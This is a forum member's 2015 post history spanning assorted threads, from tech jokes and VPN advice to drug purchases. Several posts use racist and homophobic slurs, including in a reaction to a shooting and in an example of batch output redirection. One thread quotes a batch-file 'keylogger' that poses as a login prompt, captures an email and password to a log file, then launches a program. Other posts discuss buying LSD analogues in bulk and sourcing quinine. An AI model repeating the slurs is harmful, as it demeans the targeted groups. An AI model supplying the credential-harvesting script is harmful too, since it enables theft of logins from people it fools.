User Controls
Posts by aldra
-
2015-09-24 at 8:18 AM UTC in October 1st Liability Shift Fraud
-
2015-09-24 at 8:16 AM UTC in The apocalypse starts tomorrow september 23rdyou write like a poet who gets his inspiration from drinking hand sanitiser
-
2015-09-01 at 7:54 AM UTC in Running python program as a Windows service.just use sc create from the commandline ... do it from batch or use a system call from within python
-
2015-09-01 at 7:51 AM UTC in WDBJ-TV Reporter shooting was a racially motivated hate crime.
Against white people. http://www.tmz.com/2015/08/26/bryce-williams-vester-flanagan-shooter-manifesto-abc-news-charleston-church/ Fuck you nigger faggot.
"you're just a virus in Nike shoes" best comment I've seen in a while, on tmz no less -
2015-08-27 at 8:14 AM UTC in Is it wrong of me to keep watching the live TV reporters shooting video?saw the topic, signed in for the first time in a few months to post 'i don't wanna be be right' rekt
-
2015-07-29 at 2:35 AM UTC in Shitty Technical Jokes
This one is great too.
// Life Motto
if (sad() ==== true) {
sad.stop.();
BeAwesome();
}
while(!crunk){get(crunk)};
ps. what bastard language uses four equals for a boolean match
-
2015-07-28 at 12:46 PM UTC in How do you maintain your privacy/safety on the internet? AKA The NETSEC thread.not using your name or any real information in signups, blogs, social networking etc. is enough to stop most kidiots, but the sheer amount of information you have to provide if you have a decent job and any utilities, bills etc. means unless you completely obfuscate your connection details all the time, uncle leo will probably be able to eventually find you. I guess it's just a matter of making the effort unworthwhile (dunno if that's even a word). I honestly don't put all that much effort in anymore - it's become a lot more tiresome in the last 5-10 years due to spyware ('advertising initiatives') and data collectors being built into fucking everything popular, along with the proliferation of applications and services whose primary purpose is invisible to the user.
-
2015-07-28 at 12:39 PM UTC in Dutch Parliamentary Debate on Drastic Monetary Reform Coming.wow
I couldn't imagine that happening here, or anywhere else for that matter... maybe I'm just not familiar enough with europe -
2015-07-28 at 12:36 PM UTC in New site logowhat happened to the last banner competition, I actually spurted a little effort into it
-
2015-07-28 at 12:34 PM UTC in I'm gheywhy was saddam hussein like little miss muffet
they both had a whole lot of kurds in their whey -
2015-07-24 at 1:40 AM UTC in attn arthurhttp://www.healthyvillage.com/product_details/366.html
I just did a quick search to make sure it wasn't controlled; there are probably better places to get it -
2015-07-24 at 1:37 AM UTC in attn arthuryeah, only problem is there's an extremely small amount of quinine (or quinidine, can't remember which) in a bottle of soda. if it works for you great; otherwise I believe it's possible to get the raw bark from some health food stores
-
2015-07-22 at 2:34 AM UTC in Share Yr GithubI'll run one up
actually -
2015-07-21 at 2:54 PM UTC in overdosed 3 times off 1 hit of spice
-
2015-07-21 at 2:39 PM UTC in Simple Keylogger With Notepadyou can't bind an exe to pdf and expect it to run unless it's leveraging an existing exploit in the reader application
you can inject javascript because the pdf format is a faggot farm though -
2015-07-21 at 2:28 PM UTC in Simple Keylogger With Notepad
The following is to be used for research purposes only, and I take no responsibility for anything done with malicious intent.
Alright, we're just going to use Notepad to make a simple .bat (Batch) file, keylogger.
Start by opening Notepad, then pasting in the following code:
@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit
Make a folder on your desktop called "Logs". It must be logs or it will not work.
Drag that folder into C:\
Now run a test of your "Logger.bat".
Once tested, go back to the "Logs" folder in C:\ and there will be a .txt file. If a second entry is made, the .txt will overwrite itself.
Enjoy!
that's not a keylogger, it just asks for a username and password and saves it to a file
if you change the following line
echo Username="%user%" Password="%pass%" >> Log.txt
to
echo Username="%user%" Password="%pass%" >> Log.txt
it'll append to the log.txt file instead of overwriting it.
with batch files, < and > are control characters so UNLESS you actually want to use them as control characters you need to use < and > to print them to screen.
In this case we actually do want to use them as control.
when outputting to a file, a single > is write to file (overwrite if file exists), >> is append to file (add to end of exiting file, create if it doesn't exist.
EXAMPLE (you can type these directly into command prompt):
echo "niggers like watermelon"
displays "niggers like watermelon" on the screen.
echo "niggers" > output.txt
echo "like watermelon" > output.txt
will make a file that contains "like watermelon". it originally said "niggers" but the second output overwrote it.
echo "niggers" > output.txt
echo "like watermelon" >> output.txt
file should now contain
"niggers"
"like watermelon"
the first output created/overwrote the output file, the second output overwrote it
what the faggot why can't I embed images
oh. there we go -
2015-07-21 at 5:52 AM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
[h=3][/h] 100 x 100µg 1P-LSD tabs for a little less than $400 from liserd labs, not a bad price, that'd last me a good long while. Does this stuff have an expiration date? If I put an order together (not right away) would anyone be interested in going in on it?
as I understand it acid usually lasts a few months to a year if you protect it well - it's sensitive to moisture and light. theoretically if it's kept airtight in the dark you could keep it forever but I don't know how practical that is....
so I probably wouldn't bother getting 100 unless you plan on reselling or losing your mind -
2015-07-21 at 5:50 AM UTC in The retarded thread: Fuck, §m£ÂgØL made one first edition
Stephen Hawking announces $100 million hunt for alien life
https://www.reddit.com/r/worldnews/comments/3dy1gb/stephen_hawking_announces_100_million_hunt_for/
Sweet! They may get as much data in a day as SETI does in a year. It's being funded by the Russian billionaire Yuri Milner, who seems like a pretty cool guy, very cool shared interests and projects.
I was imagining stephen hawking in full camo rolling around the forest with a rifle -
2015-07-21 at 5:44 AM UTC in Can someone delete my account?no
ps. faggot -
2015-07-03 at 12:17 AM UTC in Can someone give me the low down on VPNs?seedb0x if you've got a bit more money to spend
I use one in europe... it seems very unlikely that your local government will petition a foreign government to investigate ownership of a VPN account for something as trivial as downloading movies.